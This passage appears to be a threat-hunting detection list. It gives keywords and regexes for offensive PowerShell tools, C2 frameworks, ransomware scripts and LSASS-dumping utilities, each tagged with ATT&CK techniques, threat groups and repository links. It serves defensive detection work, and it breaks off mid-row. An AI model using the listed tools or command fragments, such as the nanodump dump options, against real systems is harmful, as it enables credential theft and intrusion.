"*PowerShellArsenal*",".{0,1000}PowerShellArsenal.{0,1000}","offensive_tool_keyword","PowerShellArsenal","PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code. perform .NET malware analysis. analyze/scrape memory. parse file formats and memory structures. obtain internal system information. 
etc.","T1057 - T1053 - T1050 - T1564 - T1083 - T1003","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/mattifestation/PowerShellArsenal","1","1","N/A","N/A","9","844","228","2021-08-20T08:41:50Z","2014-11-16T15:20:17Z" "*PowerShellArtifactGenerator.py*",".{0,1000}PowerShellArtifactGenerator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*PowershellCradleGenerator.*",".{0,1000}PowershellCradleGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PowerShellEmpire*",".{0,1000}PowerShellEmpire.{0,1000}","offensive_tool_keyword","empire","PowerShell offers a multitude of offensive advantages. including full .NET access. application whitelisting. direct access to the Win32 API. the ability to assemble malicious binaries in memory. and a default installation on Windows 7+. Offensive PowerShell had a watershed year in 2014. but despite the multitude of useful projects. 
many pentesters still struggle to integrate PowerShell into their engagements in a secure manner.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://www.powershellempire.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PowerShellExecuter.cs*",".{0,1000}PowerShellExecuter\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*powershell-import *.ps1*",".{0,1000}powershell\-import\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*powershell-import*Invoke-Kerberoast.ps1*",".{0,1000}powershell\-import.{0,1000}Invoke\-Kerberoast\.ps1.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell-import*ShareFinder.ps1*",".{0,1000}powershell\-import.{0,1000}ShareFinder\.ps1.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PowershellKerberos-main*",".{0,1000}PowershellKerberos\-main.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*PowerShellMafia*",".{0,1000}PowerShellMafia.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - 
T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PowerShellMafia/PowerSCCM*",".{0,1000}PowerShellMafia\/PowerSCCM.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","327","109","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*PowerShellMafia/PowerSploit*",".{0,1000}PowerShellMafia\/PowerSploit.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*PowerShellObfuscator.ps1*",".{0,1000}PowerShellObfuscator\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*PowershellRunner.h*",".{0,1000}PowershellRunner\.h.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*PowerShellStager*",".{0,1000}PowerShellStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*PowerShell-Suite*",".{0,1000}PowerShell\-Suite.{0,1000}","offensive_tool_keyword","PowerShell-Suite","There are great tools and resources online to accomplish most any task in PowerShell. sometimes however. there is a need to script together a util for a specific purpose or to bridge an ontological gap. This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind.","T1059 - T1086 - T1140 - T1145 - T1216","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/PowerShell-Suite","1","1","N/A","N/A","10","2566","760","2021-11-19T12:18:24Z","2015-12-11T13:14:41Z" "*PowershellTools-main.zip*",".{0,1000}PowershellTools\-main\.zip.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*PowerShx.dll*",".{0,1000}PowerShx\.dll.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" 
"*PowerShx.exe*",".{0,1000}PowerShx\.exe.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*PowerShx.sln*",".{0,1000}PowerShx\.sln.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*PowerShxDll.csproj*",".{0,1000}PowerShxDll\.csproj.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*PowerShx-master*",".{0,1000}PowerShx\-master.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*PowerSploit*",".{0,1000}PowerSploit.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*PowerSploit-*.zip*",".{0,1000}PowerSploit\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*PowerSploit.*",".{0,1000}PowerSploit\..{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*PowerSploit/releases*",".{0,1000}PowerSploit\/releases.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*powerstager*",".{0,1000}powerstager.{0,1000}","offensive_tool_keyword","PowerStager","PowerStager: This script creates an executable stager that downloads a selected powershell payload.","T1105 - T1059.001 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/z0noxz/powerstager","1","1","N/A","N/A","2","182","59","2019-12-15T09:30:05Z","2017-04-17T12:13:31Z" "*PowerUp.ps1*",".{0,1000}PowerUp\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*PowerUp.ps1*",".{0,1000}PowerUp\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1128","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*PowerUpSQL*",".{0,1000}PowerUpSQL.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1087 - T1059 - T1003 - T1078 - T1053 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","2330","455","2024-04-29T09:10:57Z","2016-06-22T01:22:39Z" "*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controller running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
"*powerview.ps1*",".{0,1000}powerview\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1078","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows net commands. 
which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality It also implements various useful metafunctions. including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist","T1087 - T1069 - T1064 - T1002 - T1552","TA0002 - TA0003 - TA0008","N/A","N/A","Information Gathering","https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon","1","0","N/A","N/A","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*PowerView_dev.ps1*",".{0,1000}PowerView_dev\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*PowerView3-Aggressor*",".{0,1000}PowerView3\-Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*ppenum.c*",".{0,1000}ppenum\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","96","8","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" "*ppenum.exe*",".{0,1000}ppenum\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","96","8","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" "*ppenum.x64.*",".{0,1000}ppenum\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","96","8","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" "*ppenum.x86.*",".{0,1000}ppenum\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","96","8","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" "*PPIDSpoof.ps1*",".{0,1000}PPIDSpoof\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells 
in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*ppl* --elevate-handle *.dmp*",".{0,1000}ppl.{0,1000}\s\-\-elevate\-handle\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*ppl_dump.x64*",".{0,1000}ppl_dump\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 